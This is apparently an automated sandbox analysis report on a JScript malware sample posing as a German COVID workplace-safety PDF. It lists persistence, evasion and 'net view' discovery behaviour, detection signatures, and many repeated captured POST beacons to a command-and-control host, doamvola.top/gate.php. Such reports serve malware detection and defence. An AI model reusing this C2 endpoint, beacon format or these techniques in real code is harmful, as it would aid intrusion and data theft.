Loading ...

Play interactive tourEdit tour

Analysis Report Arbeitsschutzregel-Corona-September.pdf.js

Overview

General Information

Sample Name:Arbeitsschutzregel-Corona-September.pdf.js
Analysis ID:284446
MD5:cbb53b682fbddca875973ea4f826a1df
SHA1:56eb48fdb6084855df9e111f481b88f1ccffbd1e
SHA256:8e9a1693a52155ce2aa8758413e594128e3b5f3b9fb18ef2a1e4084156817443

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Drops script or batch files to the startup folder
Found C&C like URL pattern
May check the online IP address of the machine
Opens network shares
Performs a network lookup / discovery via net view
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses an obfuscated file name to hide its real file extension (double extension)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • wscript.exe (PID: 532 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 045451FA238A75305CC26AC982472367)
    • cmd.exe (PID: 2304 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad6A9FF.tmp' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • net.exe (PID: 2936 cmdline: net view MD5: 63DD6FBAABF881385899FD39DF13DCE3)
  • wscript.exe (PID: 2900 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 045451FA238A75305CC26AC982472367)
    • cmd.exe (PID: 2788 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radBF046.tmp' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • net.exe (PID: 3032 cmdline: net view MD5: 63DD6FBAABF881385899FD39DF13DCE3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Drops script at startup locationShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Sigma detected: Net.exe ExecutionShow sources
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view , CommandLine: net view , CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad6A9FF.tmp', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2304, ProcessCommandLine: net view , ProcessId: 2936

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Arbeitsschutzregel-Corona-September.pdf.jsAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsAvira: detection malicious, Label: JS/FileCoder.AI
Multi AV Scanner detection for domain / URLShow sources
Source: doamvola.topVirustotal: Detection: 6%Perma Link
Source: http://doamvola.top/Virustotal: Detection: 6%Perma Link
Source: http://doamvola.top/gate.phpVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Arbeitsschutzregel-Corona-September.pdf.jsVirustotal: Detection: 40%Perma Link
Source: Arbeitsschutzregel-Corona-September.pdf.jsReversingLabs: Detection: 24%

Spreading:

barindex
Performs a network lookup / discovery via net viewShow sources
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

Networking:

barindex
Found C&C like URL patternShow sources
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
